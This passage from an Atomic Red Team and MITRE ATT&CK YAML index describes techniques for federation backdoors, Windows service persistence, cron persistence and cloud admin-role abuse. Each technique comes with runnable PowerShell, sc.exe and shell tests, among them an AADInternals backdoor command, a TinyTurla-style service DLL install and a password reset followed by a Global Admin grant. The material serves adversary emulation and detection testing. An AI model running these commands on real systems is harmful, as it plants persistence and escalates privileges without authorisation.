without the need to compromise the signing certificate to forge new credentials.
Instead, an adversary can manipulate domain trusts to add their own signing
certificate. An adversary may also convert an AD domain to a federated domain
using Active Directory Federation Services (AD FS), which may enable malicious
trust modifications such as altering the claim issuance rules to log in any
valid set of credentials as a specified user.(Citation: AADInternals zure
AD Federated Domain) \n\nAn adversary may also add a new federated identity
provider to an identity tenant such as Okta or AWS IAM Identity Center, which
may enable the adversary to authenticate as any user of the tenant.(Citation:
Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
gain broad access into a variety of cloud-based services that leverage the
identity tenant. For example, in AWS environments, an adversary that creates
a new identity provider for an AWS Organization will be able to federate into
all of the AWS Organization member accounts without creating identities for
each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Blake Strom, Microsoft 365 Defender
- Praetorian
- Obsidian Security
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Identity Provider
- Windows
x_mitre_version: '2.2'
identifier: T1484.002
atomic_tests:
- name: Add Federation to Azure AD
auto_generated_guid: 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7
description: |
Add a new federated domain to Azure AD using PowerShell.
The malicious domain to be federated must be configured beforehand (outside of the scope of this test):
1. Open Azure Portal
2. Add a new "custom domain name"
3. Verify the domain by following instructions (i.e. create the requested DNS record)
supported_platforms:
- azure-ad
input_arguments:
azure_username:
description: Username of a privileged Azure AD account such as External
Identity Provider Administrator or Global Administrator roles
type: string
default: bruce.wayne@contosocloud.com
azure_password:
description: Password of azure_username
type: string
default: iamthebatman
domain_name:
description: Malicious federated domain name
type: string
default: contoso.com
dependency_executor_name: powershell
dependencies:
- description: 'AzureAD and AADInternals Powershell modules must be installed.
'
prereq_command: 'if ((Get-Module -ListAvailable -Name AzureAD) -And (Get-Module
-ListAvailable -Name AADInternals)) {exit 0} else {exit 1}
'
get_prereq_command: |
Install-Module -Name AzureAD -Force
Install-Module -Name AADInternals -Force
executor:
command: |
Import-Module AzureAD
Import-Module AADInternals
$PWord = ConvertTo-SecureString -String "#{azure_password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{azure_username}", $Pword
try {
Connect-AzureAD -Credential $Credential -ErrorAction Stop > $null
}
catch {
Write-Host "Error: AzureAD could not connect"
exit 1
}
try {
$domain = Get-AzureADDomain -Name "#{domain_name}"
}
catch {
Write-Host "Error: domain ""#{domain_name}"" not found"
exit 1
}
if (-Not $domain.IsVerified) {
Write-Host "Error: domain ""#{domain_name}"" not verified"
exit 1
}
if ($domain.AuthenticationType -eq "Federated") {
Write-Host "Error: domain ""#{domain_name}"" already federated. Try with a different domain or re-create it before."
exit 1
}
$at = Get-AADIntAccessTokenForAADGraph -Credentials $Credential
if (-Not $at) {
Write-Host "Error: AADInternals could not connect"
exit 1
}
$new = ConvertTo-AADIntBackdoor -AccessToken $at -DomainName "#{domain_name}"
if ($new) {
Write-Host "Federation successfully added to Azure AD"
Write-Host $new
}
else {
Write-Host "The federation setup failed"
}
Write-Host "End of federation configuration."
cleanup_command: |
try {
Import-Module AzureAD -ErrorAction Ignore
$PWord = ConvertTo-SecureString -String "#{azure_password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{azure_username}", $Pword
Connect-AzureAD -Credential $Credential -ErrorAction Ignore > $null
Remove-AzureADDomain -Name "#{domain_name}" -ErrorAction Ignore
} catch {}
name: powershell
T1543.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32
created: '2020-01-17T19:13:50.402Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1543/003
external_id: T1543.003
- source_name: Microsoft Windows Event Forwarding FEB 2018
description: Hardy, T. & Hall, J. (2018, February 15). Use Windows Event Forwarding
to help with intrusion detection. Retrieved August 7, 2018.
url: https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection
- source_name: ESET InvisiMole June 2020
description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
- source_name: SANS 1
description: Joshua Wright. (2020, October 13). Retrieved March 22, 2024.
url: https://www.sans.org/blog/red-team-tactics-hiding-windows-services/
- source_name: SANS 2
description: Joshua Wright. (2020, October 14). Retrieved March 22, 2024.
url: https://www.sans.org/blog/defense-spotlight-finding-hidden-windows-services/
- source_name: TechNet Services
description: Microsoft. (n.d.). Services. Retrieved June 7, 2016.
url: https://technet.microsoft.com/en-us/library/cc772408.aspx
- source_name: Microsoft 4697 APR 2017
description: 'Miroshnikov, A. & Hall, J. (2017, April 18). 4697(S): A service
was installed in the system. Retrieved August 7, 2018.'
url: https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697
- source_name: Symantec W.32 Stuxnet Dossier
description: Nicolas Falliere, Liam O. Murchu, Eric Chien. (2011, February).
W32.Stuxnet Dossier. Retrieved December 7, 2020.
url: https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf
- source_name: Unit42 AcidBox June 2020
description: 'Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare
Malware Repurposing Turla Group Exploit Targeted Russian Organizations.
Retrieved March 16, 2021.'
url: https://unit42.paloaltonetworks.com/acidbox-rare-malware/
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
url: https://technet.microsoft.com/en-us/sysinternals/bb963902
- source_name: Crowdstrike DriveSlayer February 2022
description: Thomas, W. et al. (2022, February 25). CrowdStrike Falcon Protects
from New Wiper Malware Used in Ukraine Cyberattacks. Retrieved March 25,
2022.
url: https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-ukraine-attacks/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:33.408Z'
name: 'Create or Modify System Process: Windows Service'
description: "Adversaries may create or modify Windows services to repeatedly
execute malicious payloads as part of persistence. When Windows boots up,
it starts programs or applications called services that perform background
system functions.(Citation: TechNet Services) Windows service configuration
information, including the file path to the service's executable or recovery
programs/commands, is stored in the Windows Registry.\n\nAdversaries may install
a new service or modify an existing service to execute at startup in order
to persist on a system. Service configurations can be set or modified using
system utilities (such as sc.exe), by directly modifying the Registry, or
by interacting directly with the Windows API. \n\nAdversaries may also use
services to install and execute malicious drivers. For example, after dropping
a driver file (ex: `.sys`) to disk, the payload can be loaded and registered
via [Native API](https://attack.mitre.org/techniques/T1106) functions such
as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()`
and `ZwSetValueKey()`), by creating the required service Registry values (i.e.
[Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using
command-line utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet
Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42
AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s
to hide the presence of malicious activity on a system. Adversaries may also
load a signed yet vulnerable driver onto a compromised machine (known as \"Bring
Your Own Vulnerable Driver\" (BYOVD)) as part of [Exploitation for Privilege
Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole
June 2020)(Citation: Unit42 AcidBox June 2020)\n\nServices may be created
with administrator privileges but are executed under SYSTEM privileges, so
an adversary may also use a service to escalate privileges. Adversaries may
also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002).\n\nTo
make detection analysis more challenging, malicious services may also incorporate
[Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004)
(ex: using a service and/or payload name related to a legitimate OS or benign
software component). Adversaries may also create ‘hidden’ services (i.e.,
[Hide Artifacts](https://attack.mitre.org/techniques/T1564)), for example
by using the `sc sdset` command to set service permissions via the Service
Descriptor Definition Language (SDDL). This may hide a Windows service from
the view of standard service enumeration methods such as `Get-Service`, `sc
query`, and `services.exe`.(Citation: SANS 1)(Citation: SANS 2)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Matthew Demaske, Adaptforward
- Pedro Harrison
- Mayuresh Dani, Qualys
- Wietze Beukema, @wietze
- Akshat Pradhan, Qualys
- Wirapong Petshagun
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.6'
identifier: T1543.003
atomic_tests:
- name: Modify Fax service to run PowerShell
auto_generated_guid: ed366cde-7d12-49df-a833-671904770b9f
description: |
This test will temporarily modify the service Fax by changing the binPath to PowerShell
and will then revert the binPath change, restoring Fax to its original state.
Upon successful execution, cmd will modify the binpath for `Fax` to spawn powershell. Powershell will then spawn.
supported_platforms:
- windows
input_arguments:
service_name:
description: The name of the service that will be modified
type: string
default: Fax
service_binpath:
description: The default value for the binary path of the service
type: string
default: C:\WINDOWS\system32\fxssvc.exe
executor:
name: command_prompt
elevation_required: true
command: |
sc config #{service_name} binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\""
sc start #{service_name}
cleanup_command: 'sc config #{service_name} binPath= "#{service_binpath}"
>nul 2>&1
'
- name: Service Installation CMD
auto_generated_guid: 981e2942-e433-44e9-afc1-8c957a1496b6
description: |
Download an executable from github and start it as a service.
Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout.
supported_platforms:
- windows
input_arguments:
binary_path:
description: Name of the service binary, include path.
type: path
default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe
service_type:
description: Type of service. May be own|share|interact|kernel|filesys|rec|userown|usershare
type: string
default: Own
startup_type:
description: Service start method. May be boot|system|auto|demand|disabled|delayed-auto
type: string
default: auto
service_name:
description: Name of the Service
type: string
default: AtomicTestService_CMD
dependency_executor_name: powershell
dependencies:
- description: 'Service binary must exist on disk at specified location (#{binary_path})
'
prereq_command: 'if (Test-Path "#{binary_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{binary_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
executor:
name: command_prompt
elevation_required: true
command: |
sc.exe create #{service_name} binPath= "#{binary_path}" start=#{startup_type} type=#{service_type}
sc.exe start #{service_name}
cleanup_command: |
sc.exe stop #{service_name} >nul 2>&1
sc.exe delete #{service_name} >nul 2>&1
- name: Service Installation PowerShell
auto_generated_guid: 491a4af6-a521-4b74-b23b-f7b3f1ee9e77
description: |
Installs A Local Service via PowerShell.
Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will be displayed.
supported_platforms:
- windows
input_arguments:
binary_path:
description: Name of the service binary, include path.
type: path
default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe
service_name:
description: Name of the Service
type: string
default: AtomicTestService_PowerShell
dependency_executor_name: powershell
dependencies:
- description: 'Service binary must exist on disk at specified location (#{binary_path})
'
prereq_command: 'if (Test-Path "#{binary_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{binary_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
executor:
name: powershell
elevation_required: true
command: |
New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}"
Start-Service -Name "#{service_name}"
cleanup_command: |
Stop-Service -Name "#{service_name}" 2>&1 | Out-Null
try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()}
catch {}
- name: TinyTurla backdoor service w64time
auto_generated_guid: ef0581fd-528e-4662-87bc-4c2affb86940
description: |
It's running Dll as service to emulate the TinyTurla backdoor
[Related Talos Blog](https://blog.talosintelligence.com/2021/09/tinyturla.html)
supported_platforms:
- windows
input_arguments:
dllfilename:
description: It specifies Dll file to run as service
type: string
default: "$PathToAtomicsFolder\\T1543.003\\bin\\w64time.dll"
executor:
command: |-
copy "#{dllfilename}" %systemroot%\system32\
sc create W64Time binPath= "c:\Windows\System32\svchost.exe -k TimeService" type= share start=auto
sc config W64Time DisplayName= "Windows 64 Time"
sc description W64Time "Maintain date and time synch on all clients and services in the network"
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /t REG_MULTI_SZ /d "W64Time" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%systemroot%\system32\w64time.dll" /f
sc start W64Time
cleanup_command: |-
sc stop W64Time
sc.exe delete W64Time
del %systemroot%\system32\w64time.dll
reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /f
name: command_prompt
elevation_required: true
- name: Remote Service Installation CMD
auto_generated_guid: fb4151a2-db33-4f8c-b7f8-78ea8790f961
description: |
Download an executable from github and start it as a service on a remote endpoint
Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout.
supported_platforms:
- windows
input_arguments:
binary_path:
description: Name of the service binary, include path.
type: path
default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe
service_type:
description: Type of service. May be own,share,interact,kernel,filesys,rec,userown,usershare
type: string
default: Own
startup_type:
description: Service start method. May be boot,system,auto,demand,disabled,delayed-auto
type: string
default: auto
service_name:
description: Name of the Service
type: string
default: AtomicTestService_CMD
remote_host:
description: Name of the remote endpoint
type: string
default: localhost
dependency_executor_name: powershell
dependencies:
- description: 'Service binary must exist on disk at specified location (#{binary_path})
'
prereq_command: 'if (Test-Path "#{binary_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{binary_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
executor:
name: command_prompt
elevation_required: true
command: |
sc.exe \\#{remote_host} create #{service_name} binPath= "#{binary_path}" start=#{startup_type} type=#{service_type}
sc.exe \\#{remote_host} start #{service_name}
cleanup_command: |
sc.exe \\#{remote_host} stop #{service_name} >nul 2>&1
sc.exe \\#{remote_host} delete #{service_name} >nul 2>&1
- name: Modify Service to Run Arbitrary Binary (Powershell)
auto_generated_guid: 1f896ce4-8070-4959-8a25-2658856a70c9
description: "This test will use PowerShell to temporarily modify a service
to run an arbitrary executable by changing its binary path and will then revert
the binary path change, restoring the service to its original state.\nThis
technique was previously observed through SnapMC's use of Powerspolit's invoke-serviceabuse
function. \n[Reference](https://blog.fox-it.com/2021/10/11/snapmc-skips-ransomware-steals-data/)\n"
supported_platforms:
- windows
input_arguments:
service_name:
description: Name of the service to modify
type: string
default: fax
new_bin_path:
description: Path of the new service binary
type: String
default: "$env:windir\\system32\\notepad.exe"
original_bin_path:
description: Path of the original service binary
type: String
default: "$env:windir\\system32\\fxssvc.exe"
executor:
command: |-
Stop-Service -Name "#{service_name}" -force -erroraction silentlycontinue | Out-Null
set-servicebinarypath -name "#{service_name}" -path "#{new_bin_path}"
start-service -Name "#{service_name}" -erroraction silentlycontinue | out-null
cleanup_command: |-
Stop-Service -Name "#{service_name}" -force -erroraction silentlycontinue | Out-Null
set-servicebinarypath -name "#{service_name}" -path "#{original_bin_path}" -erroraction silentlycontinue | out-null
name: powershell
elevation_required: true
T1053.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
created: '2019-12-03T14:25:00.538Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1053/003
external_id: T1053.003
- source_name: CloudSEK ESXiArgs 2023
description: Mehardeep Singh Sawhney. (2023, February 9). Analysis of Files
Used in ESXiArgs Ransomware Attack Against VMware ESXi Servers. Retrieved
March 26, 2025.
url: https://www.cloudsek.com/blog/analysis-of-files-used-in-esxiargs-ransomware-attack-against-vmware-esxi-servers
- source_name: 20 macOS Common Tools and Techniques
description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:33.856Z'
name: 'Scheduled Task/Job: Cron'
description: |-
Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths.
An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). In ESXi environments, cron jobs must be created directly via the crontab file (e.g., `/var/spool/cron/crontabs/root`).(Citation: CloudSEK ESXiArgs 2023)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- ESXi
x_mitre_version: '1.3'
identifier: T1053.003
atomic_tests:
- name: Cron - Replace crontab with referenced file
auto_generated_guid: 435057fb-74b1-410e-9403-d81baf194f75
description: 'This test replaces the current user''s crontab file with the contents
of the referenced file. This technique was used by numerous IoT automated
exploitation attacks.
'
supported_platforms:
- linux
- macos
input_arguments:
command:
description: Command to execute
type: string
default: "/tmp/evil.sh"
tmp_cron:
description: Temporary reference file to hold evil cron schedule
type: path
default: "/tmp/persistevil"
executor:
name: sh
command: |
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
cleanup_command: 'crontab /tmp/notevil
'
- name: Cron - Add script to all cron subfolders
auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0
description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily,
/etc/cron.monthly and /etc/cron.weekly folders configured to execute on a
schedule. This technique was used by the threat actor Rocke during the exploitation
of Linux web servers.
'
supported_platforms:
- macos
- linux
input_arguments:
command:
description: Command to execute
type: string
default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log
cron_script_name:
description: Name of file to store in cron folder
type: string
default: persistevil
executor:
elevation_required: true
name: bash
command: |
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
cleanup_command: |
rm /etc/cron.daily/#{cron_script_name} -f
rm /etc/cron.hourly/#{cron_script_name} -f
rm /etc/cron.monthly/#{cron_script_name} -f
rm /etc/cron.weekly/#{cron_script_name} -f
- name: Cron - Add script to /etc/cron.d folder
auto_generated_guid: '078e69eb-d9fb-450e-b9d0-2e118217c846'
description: 'This test adds a script to /etc/cron.d folder configured to execute
on a schedule.
'
supported_platforms:
- linux
input_arguments:
command:
description: Command to execute
type: string
default: echo '*/5 * * * * root echo "Hello
from Atomic Red Team"' > /tmp/atomic.log
cron_script_name:
description: Name of file to store in cron folder
type: string
default: persistevil
executor:
elevation_required: true
name: sh
command: 'echo "#{command}" > /etc/cron.d/#{cron_script_name}
'
cleanup_command: 'rm /etc/cron.d/#{cron_script_name} -f
'
- name: Cron - Add script to /var/spool/cron/crontabs/ folder
auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4
description: 'This test adds a script to a /var/spool/cron/crontabs folder configured
to execute on a schedule. This technique was used by the threat actor Rocke
during the exploitation of Linux web servers.
'
supported_platforms:
- linux
input_arguments:
command:
description: Command to execute
type: string
default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log
cron_script_name:
description: Name of file to store in /var/spool/cron/crontabs folder
type: string
default: persistevil
executor:
elevation_required: true
name: bash
command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
'
cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} -f
'
T1098.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3
created: '2020-01-19T16:59:45.362Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1098/003
external_id: T1098.003
- source_name: Expel AWS Attacker
description: " Brian Bahtiarian, David Blanton, Britton Manahan and Kyle Pellett.
(2022, April 5). Incident report: From CLI to console, chasing an attacker
in AWS. Retrieved April 7, 2022."
url: https://expel.com/blog/incident-report-from-cli-to-console-chasing-an-attacker-in-aws/
- source_name: Microsoft O365 Admin Roles
description: Ako-Adjei, K., Dickhaus, M., Baumgartner, P., Faigel, D., et.
al.. (2019, October 8). About admin roles. Retrieved October 18, 2019.
url: https://docs.microsoft.com/en-us/office365/admin/add-users/about-admin-roles?view=o365-worldwide
- source_name: AWS IAM Policies and Permissions
description: AWS. (n.d.). Policies and permissions in IAM. Retrieved April
1, 2022.
url: https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies.html
- source_name: Google Cloud IAM Policies
description: Google Cloud. (2022, March 31). Understanding policies. Retrieved
April 1, 2022.
url: https://cloud.google.com/iam/docs/policies
- source_name: Invictus IR DangerDev 2024
description: Invictus Incident Response. (2024, January 31). The curious case
of DangerDev@protonmail.me. Retrieved March 19, 2024.
url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
- source_name: Microsoft Support O365 Add Another Admin, October 2019
description: Microsoft. (n.d.). Add Another Admin. Retrieved October 18, 2019.
url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d
- source_name: Rhino Security Labs AWS Privilege Escalation
description: Spencer Gietzen. (n.d.). AWS IAM Privilege Escalation – Methods
and Mitigation. Retrieved May 27, 2022.
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:35.082Z'
name: 'Account Manipulation: Additional Cloud Roles'
description: "An adversary may add additional roles or permissions to an adversary-controlled
cloud account to maintain persistent access to a tenant. For example, adversaries
may update IAM policies in cloud-based environments or add a new global administrator
in Office 365 environments.(Citation: AWS IAM Policies and Permissions)(Citation:
Google Cloud IAM Policies)(Citation: Microsoft Support O365 Add Another Admin,
October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions,
a compromised account can gain almost unlimited access to data and settings
(including the ability to reset the passwords of other admins).(Citation:
Expel AWS Attacker)\n(Citation: Microsoft O365 Admin Roles) \n\nThis account
modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136)
or other malicious account activity. Adversaries may also modify existing
[Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have
compromised. This could lead to privilege escalation, particularly if the
roles added allow for lateral movement to additional accounts.\n\nFor example,
in AWS environments, an adversary with appropriate permissions may be able
to use the CreatePolicyVersion API to define a new version of
an IAM policy or the AttachUserPolicy API to attach an IAM policy
with additional or distinct permissions to a compromised user account.(Citation:
Rhino Security Labs AWS Privilege Escalation)\n\nIn some cases, adversaries
may add roles to adversary-controlled accounts outside the victim cloud tenant.
This allows these external accounts to perform actions inside the victim tenant
without requiring the adversary to [Create Account](https://attack.mitre.org/techniques/T1136)
or modify a victim-owned account.(Citation: Invictus IR DangerDev 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Alex Parsons, Crowdstrike
- Chris Romano, Crowdstrike
- Wojciech Lesicki
- Pià Consigny, Tenable
- Clément Notin, Tenable
- Praetorian
- Alex Soler, AttackIQ
- Arad Inbar, Fidelis Security
- Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- Identity Provider
- Office Suite
- SaaS
x_mitre_version: '2.5'
identifier: T1098.003
atomic_tests:
- name: Azure AD - Add Company Administrator Role to a user
auto_generated_guid: 4d77f913-56f5-4a14-b4b1-bf7bb24298ad
description: 'Add an existing Azure user account the Company Administrator Role.
'
supported_platforms:
- azure-ad
input_arguments:
username:
description: Azure AD username
type: string
default: jonh@contoso.com
password:
description: Azure AD password
type: string
default: p4sswd
target_user:
description: Name of the user who will be assigned the Company Admin role
type: string
default: default
dependency_executor_name: powershell
dependencies:
- description: 'MSOnline module must be installed.
'
prereq_command: 'try {if (Get-InstalledModule -Name MSOnline -ErrorAction
SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
'
get_prereq_command: 'Install-Module -Name MSOnline -Force
'
executor:
command: |
Import-Module MSOnline
$Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
Connect-MsolService -Credential $Credential
Add-MsolRoleMember -RoleName "Company Administrator" -RoleMemberEmailAddress "#{target_user}"
cleanup_command: 'Remove-MsolRoleMember -RoleName "Company Administrator"
-RoleMemberType User -RoleMemberEmailAddress "#{target_user}"
'
name: powershell
elevation_required: false
- name: Simulate - Post BEC persistence via user password reset followed by user
added to company administrator role
auto_generated_guid: 14f3af20-61f1-45b8-ad31-4637815f3f44
description: |
This test looks at simulating the an adversary described in the following blog post. It involves resetting the password of a normal user and adding to the company administrator role within M365.
Reference: https://www.huntress.com/blog/business-email-compromise-via-azure-administrative-privileges
supported_platforms:
- azure-ad
input_arguments:
auth_username:
description: Azure AD username used to conduct the adversary activity
type: string
default: jonh@contoso.com
auth_password:
description: Azure AD password for user auth_username
type: string
default: p4sswd
target_user:
description: Name of the user whose password be reset and added to the admin
role.
type: string
default: default
target_password:
description: The password that the user target_user will be reset to.
type: string
default: Ohn05GeMe#$
dependency_executor_name: powershell
dependencies:
- description: 'MSOnline and AzureAD modules must be installed.
'
prereq_command: |
$required_mods = 'AzureAD', 'MSOnline'
$installed_mods = @((Get-Module $required_mods -ListAvailable -ErrorAction SilentlyContinue).Name | Select-Object -Unique)
$notInstalled = Compare-Object $required_mods $installed_mods -PassThru -ErrorAction SilentlyContinue
if ($notInstalled) {
# Prompt for installing the missing ones.
Write-Output "The following PS modules aren't currently installed:"
$notInstalled
exit 1
}
else{
Write-Output "All required PS modules are installed"
exit 0
}
get_prereq_command: |
Install-Module -Name MSOnline -Scope CurrentUser -Force
Install-Module -Name AzureAD -Scope CurrentUser -Force
executor:
command: |
Import-Module MSOnline
Import-Module AzureAD
$password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
$targetsecurepw = ConvertTo-SecureString -String "#{target_password}" -AsPlainText -Force
Connect-MsolService -Credential $credential -ErrorAction:SilentlyContinue
Connect-AzureAD -Credential $credential -ErrorAction:SilentlyContinue
#Saving the ObjectId of the target_user into a variable
$target_objid = Get-AzureADUser -filter "userPrincipalName eq '#{target_user}'" | Select-Object -ExpandProperty ObjectId
#Reset the password of the target_user
Set-AzureADUserPassword -ObjectId $target_objid -Password $targetsecurepw -ErrorAction:SilentlyContinue
#Adding target_user
Add-MsolRoleMember -RoleName "Company Administrator" -RoleMemberEmailAddress "#{target_user}"
Add-MsolRoleMember -RoleName "Global Reader" -RoleMemberEmailAddress "#{target_user}"
cleanup_command: |
Import-Module MSOnline
$password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
Connect-MsolService -Credential $credential
Remove-MsolRoleMember -RoleName "Company Administrator" -RoleMemberType User -RoleMemberEmailAddress "#{target_user}"
Remove-MsolRoleMember -RoleName "Global Reader" -RoleMemberType User -RoleMemberEmailAddress "#{target_user}"
name: powershell
elevation_required: false
T1547.012:
technique:
type: attack-pattern
spec_version: '2.1'
